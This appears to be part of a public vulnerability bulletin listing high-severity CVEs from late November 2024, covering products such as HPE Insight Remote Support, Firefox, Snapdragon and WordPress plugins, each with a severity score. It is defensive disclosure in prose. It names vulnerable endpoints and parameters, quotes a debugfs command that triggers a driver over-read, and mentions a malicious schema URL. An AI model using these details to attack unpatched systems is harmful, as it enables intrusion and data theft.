| Hewlett Packard Enterprise (HPE)--HPE Insight Remote Support |
An XML external entity injection (XXE) vulnerability in HPE Insight Remote Support may allow remote users to disclose information in certain cases. | 2024-11-26 | 7.3 | CVE-2024-11622 |
| Hewlett Packard Enterprise (HPE)--HPE Insight Remote Support |
An XML external entity injection (XXE) vulnerability in HPE Insight Remote Support may allow remote users to disclose information in certain cases. | 2024-11-26 | 7.3 | CVE-2024-53674 |
| Hewlett Packard Enterprise (HPE)--HPE Insight Remote Support |
An XML external entity injection (XXE) vulnerability in HPE Insight Remote Support may allow remote users to disclose information in certain cases. | 2024-11-26 | 7.3 | CVE-2024-53675 |
| Hewlett Packard Enterprise (HPE)--Insight Remote Support |
A java deserialization vulnerability in HPE Remote Insight Support may allow an unauthenticated attacker to execute code. | 2024-11-26 | 8.1 | CVE-2024-53673 |
| https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856--JobSearch WP Job Board |
The JobSearch WP Job Board plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.6.7. This is due to the plugin not properly verifying a users identity when verifying an email address through the user_account_activation function. This makes it possible for unauthenticated attackers to log in as any user, including site administrators if the users email is known. | 2024-11-28 | 9.8 | CVE-2024-11925 |
| IBM--Data Virtualization Manager for z/OS |
IBM Data Virtualization Manager for z/OS 1.1 and 1.2 could allow an authenticated user to inject malicious JDBC URL parameters and execute code on the server. | 2024-11-26 | 8.5 | CVE-2024-52899 |
| IBM--Security Verify Access |
IBM Security Verify Access Appliance 10.0.0 through 10.0.8 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. | 2024-11-29 | 9.8 | CVE-2024-49803 |
| IBM--Security Verify Access |
IBM Security Verify Access Appliance 10.0.0 through 10.0.8 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | 2024-11-29 | 9.4 | CVE-2024-49805 |
| IBM--Security Verify Access |
IBM Security Verify Access Appliance 10.0.0 through 10.0.8 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | 2024-11-29 | 9.4 | CVE-2024-49806 |
| IBM--Security Verify Access |
IBM Security Verify Access Appliance 10.0.0 through 10.0.8 could allow a locally authenticated non-administrative user to escalate their privileges due to unnecessary permissions used to perform certain tasks. | 2024-11-29 | 7.8 | CVE-2024-49804 |
| IBM--Watson Speech Services Cartridge for IBM Cloud Pak for Data |
IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data 4.0.0 through 5.0.2 does not properly check inputs to resources that are used concurrently, which might lead to unexpected states, possibly resulting in a crash. | 2024-11-26 | 7.5 | CVE-2024-49353 |
| Idealien Studios--Idealien Category Enhancements |
Cross-Site Request Forgery (CSRF) vulnerability in Idealien Studios Idealien Category Enhancements allows Stored XSS.This issue affects Idealien Category Enhancements: from n/a through 1.2. | 2024-11-28 | 7.1 | CVE-2024-53734 |
| Imagination Technologies--Graphics DDK |
Software installed and run as a non-privileged user may conduct improper GPU system calls to allow unprivileged access to arbitrary physical memory page. | 2024-11-30 | 8.1 | CVE-2024-43702 |
| Imagination Technologies--Graphics DDK |
Software installed and run as a non-privileged user may conduct improper GPU system calls to achieve unauthorised reads and writes of physical memory from the GPU HW. | 2024-11-30 | 8.1 | CVE-2024-43703 |
| Interinfo--DreamMaker |
DreamMaker from Interinfo has a Path Traversal vulnerability and does not restrict the types of uploaded files. This allows unauthenticated remote attackers to upload arbitrary files to any directory, leading to arbitrary code execution by uploading webshells. | 2024-11-29 | 9.8 | CVE-2024-11979 |
| Interinfo--DreamMaker |
DreamMaker from Interinfo has a Path Traversal vulnerability, allowing unauthenticated remote attackers to exploit this vulnerability to read arbitrary system files. | 2024-11-29 | 7.5 | CVE-2024-11978 |
| Jason Grim--Custom Shortcode Sidebars |
Cross-Site Request Forgery (CSRF) vulnerability in Jason Grim Custom Shortcode Sidebars allows Stored XSS.This issue affects Custom Shortcode Sidebars: from n/a through 1.2. | 2024-11-28 | 7.1 | CVE-2024-53736 |
| Jenkins Project--Jenkins Simple Queue Plugin |
Jenkins Simple Queue Plugin 1.4.4 and earlier does not escape the view name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Create permission. | 2024-11-27 | 8 | CVE-2024-54003 |
| Kardi--Pricing table addon for elementor |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Kardi Pricing table addon for elementor allows PHP Local File Inclusion.This issue affects Pricing table addon for elementor: from n/a through 1.0.0. | 2024-11-28 | 7.5 | CVE-2024-52499 |
| laurent22--joplin |
Joplin is an open source, privacy-focused note taking app with sync capabilities for Windows, macOS, Linux, Android and iOS. In affected versions attackers are able to abuse the fact that openExternal is used without any filtering of URI schemes to obtain remote code execution in Windows environments. This issue has been addressed in version 3.0.3 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-25 | 7.2 | CVE-2024-53268 |
| lfprojects--mlflow |
Excessive directory permissions in MLflow leads to local privilege escalation when using spark_udf. This behavior can be exploited by a local attacker to gain elevated permissions by using a ToCToU attack. The issue is only relevant when the spark_udf() MLflow API is called. | 2024-11-25 | 7 | CVE-2024-27134 |
| LLC «TriIncom--Express Payments Module |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LLC «TriIncom» Express Payments Module allows Blind SQL Injection.This issue affects Express Payments Module: from n/a through 1.1.8. | 2024-11-28 | 9.3 | CVE-2024-52474 |
| lobehub--lobe-chat |
Lobe Chat is an open-source, AI chat framework. Versions of lobe-chat prior to 1.19.13 have an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information. The jwt token header X-Lobe-Chat-Auth strored proxy address and OpenAI API Key, can be modified to scan an internal network in the target lobe-web environment. This issue has been addressed in release version 1.19.13 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-26 | 8.1 | CVE-2024-32965 |
| Maeve Lander--PayPal Responder |
Cross-Site Request Forgery (CSRF) vulnerability in Maeve Lander PayPal Responder allows Stored XSS.This issue affects PayPal Responder: from n/a through 1.2. | 2024-12-01 | 7.1 | CVE-2024-53750 |
| ManageEngine--Analytics Plus |
Zohocorp ManageEngine Analytics Plus versions below 6100 are vulnerable to authenticated sensitive data exposure which allows the users to retrieve sensitive tokens associated to the org-admin account. | 2024-11-27 | 8.1 | CVE-2024-52323 |
| marketingfire--Widget Options The #1 WordPress Widget & Block Control Plugin |
The Widget Options - The #1 WordPress Widget & Block Control Plugin plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7 via the display logic functionality that extends several page builders. This is due to the plugin allowing users to supply input that will be passed through eval() without any filtering or capability checks. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. Special note: We suggested the vendor implement an allowlist of functions and limit the ability to execute commands to just administrators, however, they did not take our advice. We are considering this patched, however, we believe it could still be further hardened and there may be residual risk with how the issue is currently patched. | 2024-11-28 | 9.9 | CVE-2024-8672 |
| Mattermost--Mattermost |
Mattermost versions 10.0.x <= 10.0.1, 10.1.x <= 10.1.1, 9.11.x <= 9.11.3, 9.5.x <= 9.5.11 fail to properly validate email addresses which allows an unauthenticated user to bypass email domain restrictions via carefully crafted input on email registration. | 2024-11-28 | 8.2 | CVE-2024-11599 |
| Microsoft--Dynamics 365 Sales for Android |
Microsoft Dynamics 365 Sales Spoofing Vulnerability | 2024-11-26 | 7.6 | CVE-2024-49053 |
| Microsoft--Microsoft Azure Functions |
Missing authentication for critical function in Microsoft Azure PolicyWatch allows an unauthorized attacker to elevate privileges over a network. | 2024-11-26 | 8.2 | CVE-2024-49052 |
| Microsoft--Microsoft Copilot Studio |
Improper neutralization of input during web page generation ('Cross-site Scripting') in Copilot Studio by an unauthorized attacker leads to elevation of privilege over a network. | 2024-11-26 | 9.3 | CVE-2024-49038 |
| Microsoft--Microsoft Partner Center |
An improper access control vulnerability in Partner.Microsoft.com allows an a unauthenticated attacker to elevate privileges over a network. | 2024-11-26 | 8.7 | CVE-2024-49035 |
| Mitsubishi Electric Corporation--GENESIS64 |
Uncontrolled Search Path Element vulnerability in ICONICS GENESIS64 all versions, Mitsubishi Electric GENESIS64 all versions and Mitsubishi Electric MC Works64 all versions allows a local authenticated attacker to execute a malicious code by storing a specially crafted DLL in a specific folder. This could lead to disclose, tamper with, destroy, or delete information in the affected products, or cause a denial of service (DoS) condition on the products. | 2024-11-28 | 7.8 | CVE-2024-8299 |
| Mitsubishi Electric Corporation--GENESIS64 |
Dead Code vulnerability in ICONICS GENESIS64 Version 10.97.2, 10.97.2 CFR1, 10.97.2 CRF2 and 10.97.3 and Mitsubishi Electric GENESIS64 Version 10.97.2, 10.97.2 CFR1, 10.97.2 CRF2 and 10.97.3 allows a local authenticated attacker to execute a malicious code by tampering with a specially crafted DLL. This could lead to disclose, tamper with, destroy, or delete information in the affected products, or cause a denial of service (DoS) condition on the products. | 2024-11-28 | 7 | CVE-2024-8300 |
| Mitsubishi Electric Corporation--GENESIS64 |
Uncontrolled Search Path Element vulnerability in ICONICS GENESIS64 all versions, Mitsubishi Electric GENESIS64 all versions and Mitsubishi Electric MC Works64 all versions allows a local authenticated attacker to execute a malicious code by storing a specially crafted DLL in a specific folder. This could lead to disclose, tamper with, destroy, or delete information in the affected products, or cause a denial of service (DoS) condition on the products. | 2024-11-28 | 7.8 | CVE-2024-9852 |
| Mozilla--Convict |
Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Mozilla Convict. This allows an attacker to inject attributes that are used in other components, or to override existing attributes with ones that have incompatible type, which may lead to a crash. The main use case of Convict is for handling server-side configurations written by the admins owning the servers, and not random users. So it's unlikely that an admin would deliberately sabotage their own server. Still, a situation can happen where an admin not knowledgeable about JavaScript could be tricked by an attacker into writing the malicious JavaScript code into some config files. This issue affects Convict: before 6.2.4. | 2024-11-26 | 8.4 | CVE-2023-0163 |
| Mozilla--Firefox |
The executable file warning was not presented when downloading .library-ms files. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.* This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 9.8 | CVE-2024-11693 |
| Mozilla--Firefox |
A flaw in handling fullscreen transitions may have inadvertently caused the application to become stuck in fullscreen mode when a modal dialog was opened during the transition. This issue left users unable to exit fullscreen mode using standard actions like pressing "Esc" or accessing right-click menus, resulting in a disrupted browsing experience until the browser is restarted. *This bug only affects the application when running on macOS. Other operating systems are unaffected.* This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 9.8 | CVE-2024-11698 |
| Mozilla--Firefox |
A double-free issue could have occurred in `sec_pkcs7_decoder_start_decrypt()` when handling an error path. Under specific conditions, the same symmetric key could have been freed twice, potentially leading to memory corruption. This vulnerability affects Firefox < 133 and Thunderbird < 133. | 2024-11-26 | 9.8 | CVE-2024-11704 |
| Mozilla--Firefox |
`NSC_DeriveKey` inadvertently assumed that the `phKey` parameter is always non-NULL. When it was passed as NULL, a segmentation fault (SEGV) occurred, leading to crashes. This behavior conflicted with the PKCS#11 v3.0 specification, which allows `phKey` to be NULL for certain mechanisms. This vulnerability affects Firefox < 133 and Thunderbird < 133. | 2024-11-26 | 9.1 | CVE-2024-11705 |
| Mozilla--Firefox |
Certain WebGL operations on Apple silicon M series devices could have lead to an out-of-bounds write and memory corruption due to a flaw in Apple's GPU driver. *This bug only affected the application on Apple M series hardware. Other platforms were unaffected.* This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Firefox ESR < 115.18, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 8.8 | CVE-2024-11691 |
| Mozilla--Firefox |
When handling keypress events, an attacker may have been able to trick a user into bypassing the "Open Executable File?" confirmation dialog. This could have led to malicious code execution. This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 8.8 | CVE-2024-11697 |
| Mozilla--Firefox |
Memory safety bugs present in Firefox 132, Firefox ESR 128.4, and Thunderbird 128.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 8.8 | CVE-2024-11699 |
| Mozilla--Firefox |
Malicious websites may have been able to user intent confirmation through tapjacking. This could have led to users unknowingly approving the launch of external applications, potentially exposing them to underlying vulnerabilities. This vulnerability affects Firefox < 133 and Thunderbird < 133. | 2024-11-26 | 8.1 | CVE-2024-11700 |
| Mozilla--Firefox |
Copying sensitive information from Private Browsing tabs on Android, such as passwords, may have inadvertently stored data in the cloud-based clipboard history if enabled. This vulnerability affects Firefox < 133 and Thunderbird < 133. | 2024-11-26 | 7.5 | CVE-2024-11702 |
| Mozilla--sccache |
On Linux the sccache client can execute arbitrary code with the privileges of a local sccache server, by preloading the code in a shared library passed to LD_PRELOAD. If the server is run as root (which is the default when installing the snap package https://snapcraft.io/sccache ), this means a user running the sccache client can get root privileges. | 2024-11-26 | 7.8 | CVE-2023-1521 |
| n/a--eNMS |
A vulnerability, which was classified as critical, has been found in eNMS up to 4.2. Affected by this issue is the function multiselect_filtering of the file eNMS/controller.py of the component TGZ File Handler. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 22b0b443acca740fc83b5544165c1f53eff3f529. It is recommended to apply a patch to fix this issue. | 2024-11-25 | 8.8 | CVE-2024-11664 |
| n/a--n/a |
A NoSQL injection vulnerability in Adapt Learning Adapt Authoring Tool <= 0.11.3 allows unauthenticated attackers to reset user and administrator account passwords via the "Reset password" feature. The vulnerability occurs due to insufficient validation of user input, which is used as a query in Mongoose's find() function. This makes it possible for attackers to perform a full takeover of the administrator account. Attackers can then use the newly gained administrative privileges to upload a custom plugin to perform remote code execution (RCE) on the server hosting the web application. | 2024-11-25 | 9.8 | CVE-2024-50672 |
| n/a--n/a |
DCME-320 <=7.4.12.90, DCME-520 <=9.25.5.11, DCME-320-L, <=9.3.5.26, and DCME-720 <=9.1.5.11 are vulnerable to Remote Code Execution via /function/system/basic/license_update.php. | 2024-11-29 | 9.8 | CVE-2024-52777 |
| n/a--n/a |
DCME-320 <=7.4.12.90, DCME-520 <=9.25.5.11, DCME-320-L <=9.3.5.26, and DCME-720 <=9.1.5.11 are vulnerable to Remote Code Execution via /function/audit/newstatistics/mon_stat_hist.php. | 2024-11-29 | 9.8 | CVE-2024-52778 |
| n/a--n/a |
DCME-320 <=7.4.12.90, DCME-520 <=9.25.5.11, DCME-320-L <=9.3.5.26, and DCME-720 <=9.1.5.11 are vulnerable to Remote Code Execution via /function/audit/newstatistics/mon_stat_top10.php. | 2024-11-29 | 9.8 | CVE-2024-52779 |
| n/a--n/a |
DCME-320 <=7.4.12.90, DCME-520 <=9.25.5.11, DCME-320-L <=9.3.5.26, and DCME-720 <=9.1.5.11 are vulnerable to Remote Code Execution via /function/system/basic/mgmt_edit.php. | 2024-11-29 | 9.8 | CVE-2024-52780 |
| n/a--n/a |
DCME-320 <=7.4.12.90, DCME-520 <=9.25.5.11, DCME-320-L <=9.3.5.26, and DCME-720 <=9.1.5.11 are vulnerable to Remote Code Execution via /function/system/tool/traceroute.php. | 2024-11-29 | 9.8 | CVE-2024-52781 |
| n/a--n/a |
DCME-320 <=7.4.12.90, DCME-520 <=9.25.5.11, DCME-320-L <=9.3.5.26, and DCME-720 <=9.1.5.11 are vulnerable to Remote Code Execution via /function/audit/newstatistics/mon_stat_hist_new.php. | 2024-11-29 | 9.8 | CVE-2024-52782 |
| n/a--n/a |
An issue in the upload_documents method of libre-chat v0.0.6 allows attackers to execute a path traversal via supplying a crafted filename in an uploaded file. | 2024-11-25 | 9.1 | CVE-2024-52787 |
| n/a--n/a |
A SQL Injection vulnerability was found in /covid-tms/check_availability.php in PHPGurukul COVID 19 Testing Management System v1.0, which allows remote attackers to execute arbitrary code via the mobnumber POST request parameter. | 2024-11-27 | 9.8 | CVE-2024-53604 |
| n/a--n/a |
EnGenius EWS356-FIR 1.1.30 and earlier devices allow a remote attacker to execute arbitrary OS commands via the Controller connectivity parameter. | 2024-11-27 | 8 | CVE-2024-31976 |
| n/a--n/a |
Stored Cross-Site Scripting in the Access Request History in Omada Identity before version 15 update 1 allows an authenticated attacker to execute arbitrary code in the browser of a victim via a specially crafted link or by viewing a manipulated Access Request History | 2024-11-27 | 8 | CVE-2024-52951 |
| n/a--n/a |
A Client-Side Template Injection (CSTI) vulnerability in the component /project/new/scrum of Taiga v 8.6.1 allows remote attackers to execute arbitrary code by injecting a malicious payload within the new project details. | 2024-11-25 | 8 | CVE-2024-53554 |
| n/a--n/a |
A CSV injection vulnerability in Taiga v6.8.1 allows attackers to execute arbitrary code via uploading a crafted CSV file. | 2024-11-26 | 8.8 | CVE-2024-53555 |
| n/a--n/a |
In Click Studios Passwordstate before build 9920, there is a potential permission escalation on the edit folder screen. | 2024-11-29 | 8.8 | CVE-2024-54124 |
| n/a--n/a |
An issue was discovered in Centreon centreon-dsm-server 24.10.x before 24.10.0, 24.04.x before 24.04.3, 23.10.x before 23.10.1, 23.04.x before 23.04.3, and 22.10.x before 22.10.2. SQL injection can occur in the form to configure Centreon DSM slots. Exploitation is only accessible to authenticated users with high-privileged access. | 2024-11-25 | 7.2 | CVE-2024-45755 |
| n/a--n/a |
An issue was discovered in Centreon centreon-open-tickets 24.10.x before 24.10.0, 24.04.x before 24.04.2, 23.10.x before 23.10.1, 23.04.x before 23.04.3, and 22.10.x before 22.10.2. SQL injection can occur in the form to create a ticket. Exploitation is only accessible to authenticated users with high-privileged access. | 2024-11-25 | 7.2 | CVE-2024-45756 |
| n/a--n/a |
In ProFTPD through 1.3.8b before cec01cc, supplemental group inheritance grants unintended access to GID 0 because of the lack of supplemental groups from mod_sql. | 2024-11-29 | 7.5 | CVE-2024-48651 |
| n/a--n/a |
A SQL Injection vulnerability was found in /covid-tms/password-recovery.php in PHPGurukul COVID 19 Testing Management System v1.0, which allows remote attackers to execute arbitrary code via the contactno POST request parameter. | 2024-11-27 | 7.3 | CVE-2024-53603 |
| n/a--n/a |
In OpenStack Neutron through 25.0.0, neutron/extensions/tagging.py can use an incorrect ID during policy enforcement. NOTE: 935883 has the "Work in Progress" status as of 2024-11-24. | 2024-11-25 | 7.5 | CVE-2024-53916 |
| NEC Corporation--UNIVERGE IX |
Command Injection vulnerability in NEC Corporation UNIVERGE IX from Ver9.2 to Ver10.10.21, for Ver10.8 up to Ver10.8.27, for Ver10.9 up to Ver10.9.14 and UNIVERGE IX-R/IX-V Ver1.2.15 and earlier allows a attacker to inject an arbitrary CLI commands to be executed on the device via the management interface. | 2024-11-29 | 7.2 | CVE-2024-11013 |
| ngtcp2--ngtcp2 |
The ngtcp2 project is an effort to implement IETF QUIC protocol in C. In affected versions acks are not validated before being written to the qlog leading to a buffer overflow. In `ngtcp2_conn::conn_recv_pkt` for an ACK, there was new logic that got added to skip `conn_recv_ack` if an ack has already been processed in the payload. However, this causes us to also skip `ngtcp2_pkt_validate_ack`. The ack which was skipped still got written to qlog. The bug occurs in `ngtcp2_qlog::write_ack_frame`. It is now possible to reach this code with an invalid ack, suppose `largest_ack=0` and `first_ack_range=15`. Subtracting `largest_ack - first_ack_range` will lead to an integer underflow which is 20 chars long. However, the ngtcp2 qlog code assumes the number written is a signed integer and only accounts for 19 characters of overhead (see `NGTCP2_QLOG_ACK_FRAME_RANGE_OVERHEAD`). Therefore, we overwrite the buffer causing a heap overflow. This is high priority and could potentially impact many users if they enable qlog. qlog is disabled by default. Due to its overhead, it is most likely used for debugging purpose, but the actual use is unknown. ngtcp2 v1.9.1 fixes the bug and users are advised to upgrade. Users unable to upgrade should not turn on qlog. | 2024-11-25 | 8.2 | CVE-2024-52811 |
| ninjateam--File Manager Pro Filester |
The File Manager Pro - Filester plugin for WordPress is vulnerable to arbitrary file uploads due to missing validation in the 'fsConnector' function in all versions up to, and including, 1.8.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload a new .htaccess file allowing them to subsequently upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-11-28 | 7.5 | CVE-2024-8066 |
| ninjateam--File Manager Pro Filester |
The File Manager Pro - Filester plugin for WordPress is vulnerable to Local JavaScript File Inclusion in all versions up to, and including, 1.8.5 via the 'fm_locale' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. The vulnerability was partially patched in version 1.8.5. | 2024-11-28 | 7.2 | CVE-2024-9669 |
| Pathomation--Pathomation |
Unrestricted Upload of File with Dangerous Type vulnerability in Pathomation allows Upload a Web Shell to a Web Server.This issue affects Pathomation: from n/a through 2.5.1. | 2024-11-28 | 10 | CVE-2024-52490 |
| PHPGurukul--Complaint Management system |
A vulnerability, which was classified as critical, was found in PHPGurukul Complaint Management system 1.0. This affects an unknown part of the file /user/index.php. The manipulation of the argument emailid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 7.3 | CVE-2024-11964 |
| PHPGurukul--Complaint Management system |
A vulnerability has been found in PHPGurukul Complaint Management system 1.0 and classified as critical. This vulnerability affects unknown code of the file /user/reset-password.php. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 7.3 | CVE-2024-11965 |
| PHPGurukul--Complaint Management system |
A vulnerability was found in PHPGurukul Complaint Management system 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 7.3 | CVE-2024-11966 |
| PHPGurukul--Complaint Management system |
A vulnerability was found in PHPGurukul Complaint Management system 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/reset-password.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 7.3 | CVE-2024-11967 |
| PHPGurukul--User Registration & Login and User Management System |
A vulnerability was found in PHPGurukul User Registration & Login and User Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 7.3 | CVE-2024-11817 |
| PHPGurukul--User Registration & Login and User Management System |
A vulnerability classified as critical has been found in PHPGurukul User Registration & Login and User Management System 1.0. This affects an unknown part of the file /signup.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-27 | 7.3 | CVE-2024-11818 |
| Prism I.T. Systems--Multilevel Referral Affiliate Plugin for WooCommerce |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prism I.T. Systems Multilevel Referral Affiliate Plugin for WooCommerce allows Reflected XSS.This issue affects Multilevel Referral Affiliate Plugin for WooCommerce: from n/a through 2.27. | 2024-12-01 | 7.1 | CVE-2024-53742 |
| ProjectSend--ProjectSend |
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Remote, unauthenticated attackers can exploit this flaw by sending crafted HTTP requests to options.php, enabling unauthorized modification of the application's configuration. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript. | 2024-11-26 | 9.8 | CVE-2024-11680 |
| python-jsonschema--check-jsonschema |
check-jsonschema is a CLI and set of pre-commit hooks for jsonschema validation. The default cache strategy uses the basename of a remote schema as the name of the file in the cache, e.g. `https://example.org/schema.json` will be stored as `schema.json`. This naming allows for conflicts. If an attacker can get a user to run `check-jsonschema` against a malicious schema URL, e.g., `https://example.evil.org/schema.json`, they can insert their own schema into the cache and it will be picked up and used instead of the appropriate schema. Such a cache confusion attack could be used to allow data to pass validation which should have been rejected. This issue has been patched in version 0.30.0. All users are advised to upgrade. A few workarounds exist: 1. Users can use `--no-cache` to disable caching. 2. Users can use `--cache-filename` to select filenames for use in the cache, or to ensure that other usages do not overwrite the cached schema. (Note: this flag is being deprecated as part of the remediation effort.) 3. Users can explicitly download the schema before use as a local file, as in `curl -LOs https://example.org/schema.json; check-jsonschema --schemafile ./schema.json` | 2024-11-29 | 7.1 | CVE-2024-53848 |
| Qualcomm, Inc.--Snapdragon |
On some hardware revisions where VP9 decoding is hardware-accelerated, the frame size is not programmed correctly into the decoder hardware which can lead to an invalid memory access by the decoder. | 2024-11-26 | 9.8 | CVE-2017-11076 |
| Qualcomm, Inc.--Snapdragon |
In multiple functions that process 802.11 frames, out-of-bounds reads can occur due to insufficient validation. | 2024-11-26 | 9.8 | CVE-2017-17772 |
| Qualcomm, Inc.--Snapdragon |
Wrong configuration in Touch Pal application can collect user behavior data without awareness by the user. | 2024-11-26 | 9.8 | CVE-2018-11922 |
| Qualcomm, Inc.--Snapdragon |
Initial xbl_sec revision does not have all the debug policy features and critical checks. | 2024-11-26 | 8.4 | CVE-2016-10394 |
| Qualcomm, Inc.--Snapdragon |
QSEE will randomly experience a fatal error during execution due to speculative instruction fetches from device memory. Device memory is not valid executable memory. | 2024-11-26 | 8.4 | CVE-2016-10408 |
| Qualcomm, Inc.--Snapdragon |
Buffer overwrite in the WLAN host driver by leveraging a compromised WLAN FW | 2024-11-26 | 8.4 | CVE-2017-15832 |
| Qualcomm, Inc.--Snapdragon |
A race condition exists in a driver potentially leading to a use-after-free condition. | 2024-11-26 | 8.4 | CVE-2017-18153 |
| Qualcomm, Inc.--Snapdragon |
Information disclosure due to uninitialized variable. | 2024-11-26 | 8.4 | CVE-2017-18306 |
| Qualcomm, Inc.--Snapdragon |
Information disclosure possible while audio playback. | 2024-11-26 | 8.4 | CVE-2017-18307 |
| Qualcomm, Inc.--Snapdragon |
An image with a version lower than the fuse version may potentially be booted lead to improper authentication. | 2024-11-26 | 8.4 | CVE-2018-11952 |
| Qualcomm, Inc.--Snapdragon |
An unsigned integer underflow vulnerability in IPA driver result into a buffer over-read while reading NAT entry using debugfs command 'cat /sys/kernel/debug/ipa/ip4_nat' | 2024-11-26 | 8.4 | CVE-2018-5852 |
| Qualcomm, Inc.--Snapdragon |
Crafted Binder Request Causes Heap UAF in MediaServer | 2024-11-26 | 7.8 | CVE-2018-11816 |
| Quick.CMS--Quick.CMS |
Absolute path traversal vulnerability in Quick.CMS, version 6.7, the exploitation of which could allow remote users to bypass the intended restrictions and download any file if it has the appropriate permissions outside of documentroot configured on the server via the aDirFiles%5B0%5D parameter in the admin.php page. This vulnerability allows an attacker to delete files stored on the server due to a lack of proper verification of user-supplied input. | 2024-11-29 | 9.1 | CVE-2024-11992 |
| quomodosoft--Shopready |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in quomodosoft Shopready allows PHP Local File Inclusion.This issue affects Shopready: from n/a through 3.5. | 2024-11-28 | 7.5 | CVE-2024-52497 |
| Rank Math SEO--Rank Math SEO |
Improper Control of Generation of Code ('Code Injection') vulnerability in Rank Math SEO allows Code Injection.This issue affects Rank Math SEO: from n/a through 1.0.231. | 2024-11-28 | 7.2 | CVE-2024-11620 |
| Red Hat--Red Hat Enterprise Linux 8 |
A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn't have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore. | 2024-11-26 | 7.4 | CVE-2024-8676 |
| Red Hat--Red Hat Enterprise Linux 9 |
A script injection vulnerability was identified in the Tuned package. The `instance_create()` D-Bus function can be called by locally logged-in users without authentication. This flaw allows a local non-privileged user to execute a D-Bus call with `script_pre` or `script_post` options that permit arbitrary scripts with their absolute paths to be passed. These user or attacker-controlled executable scripts or programs could then be executed by Tuned with root privileges that could allow attackers to local privilege escalation. | 2024-11-26 | 7.8 | CVE-2024-52336 |
| Rohit Harsh--Fence URL |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rohit Harsh Fence URL allows Stored XSS.This issue affects Fence URL: from n/a through 2.0.0. | 2024-11-28 | 7.1 | CVE-2024-53733 |
| sandboxie-plus--Sandboxie |
Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. An authenticated user (**UserA**) with no privileges is authorized to read all files created in sandbox belonging to other users in the sandbox folders `C:\Sandbox\UserB\xxx`. An authenticated attacker who can use `explorer.exe` or `cmd.exe` outside any sandbox can read other users' files in `C:\Sandbox\xxx`. By default in Windows 7+, the `C:\Users\UserA` folder is not readable by **UserB**. All files edited or created during the sandbox processing are affected by the vulnerability. All files in C:\Users are safe. If `UserB` runs a cmd in a sandbox, he will be able to access `C:\Sandox\UserA`. In addition, if **UserB** create a folder `C:\Sandbox\UserA` with malicious ACLs, when **UserA** will user the sandbox, Sandboxie doesn't reset ACLs ! This issue has not yet been fixed. Users are advised to limit access to their systems using Sandboxie. | 2024-11-29 | 9.2 | CVE-2024-49360 |
| scottopolis--AppPresser Mobile App Framework |
The AppPresser - Mobile App Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.4.6. This is due to the plugin not properly validating a user's password reset code prior to updating their password. This makes it possible for unauthenticated attackers, with knowledge of a user's email address, to reset the user's password and gain access to their account. | 2024-11-26 | 9.8 | CVE-2024-11024 |
